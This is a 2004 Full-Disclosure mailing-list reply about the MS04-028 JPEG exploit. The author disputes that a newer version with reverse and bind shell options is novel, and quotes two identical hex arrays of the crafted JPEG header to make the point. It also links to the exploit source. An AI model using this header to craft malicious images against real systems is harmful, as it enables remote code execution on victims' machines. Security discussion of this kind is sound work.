Re: [Full-Disclosure] MS04-028 Jpeg EXPLOIT with Reverse and Bind shell ...
- To: <full-disclosure@xxxxxxxxxxxxxxxx>
- Subject: Re: [Full-Disclosure] MS04-028 Jpeg EXPLOIT with Reverse and Bind shell ...
- From: "morning_wood" <se_cur_ity@xxxxxxxxxxx>
- Date: Sat, 25 Sep 2004 11:05:50 -0700
umm, no
all this has that's different is correct headers for the bind or remote shell
option, and the ability to set ports and return IP in the code, instead of
needing to use your own shellcode (or Metasploit's). note: there is no new
exploit code or vector
new.
------------------- / snip /-----------------
char header1[] =
"\xFF\xD8\xFF\xE0\x00\x10\x4A\x46\x49\x46\x00\x01\x02\x00\x00\x64"
"\x00\x64\x00\x00\xFF\xEC\x00\x11\x44\x75\x63\x6B\x79\x00\x01\x00"
"\x04\x00\x00\x00\x0A\x00\x00\xFF\xEE\x00\x0E\x41\x64\x6F\x62\x65"
"\x00\x64\xC0\x00\x00\x00\x01\xFF\xFE\x00\x01\x00\x14\x10\x10\x19"
"\x12\x19\x27\x17\x17\x27\x32\xEB\x0F\x26\x32\xDC\xB1\xE7\x70\x26"
"\x2E\x3E\x35\x35\x35\x35\x35\x3E";
------------------- / snip /-----------------
old.
------------------- / snip /-----------------
char header1[]=
"\xFF\xD8\xFF\xE0\x00\x10\x4A\x46\x49\x46\x00\x01\x02\x00\x00\x64"
"\x00\x64\x00\x00\xFF\xEC\x00\x11\x44\x75\x63\x6B\x79\x00\x01\x00"
"\x04\x00\x00\x00\x0A\x00\x00\xFF\xEE\x00\x0E\x41\x64\x6F\x62\x65"
"\x00\x64\xC0\x00\x00\x00\x01\xFF\xFE\x00\x01\x00\x14\x10\x10\x19"
"\x12\x19\x27\x17\x17\x27\x32\xEB\x0F\x26\x32\xDC\xB1\xE7\x70\x26"
"\x2E\x3E\x35\x35\x35\x35\x35\x3E";
------------------- / snip /-----------------
take your media hype and die kthnx,
m.wood
> the last step before the worm
>
> http://www.k-otik.com/exploits/09252004.JpegOfDeath.c.php
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html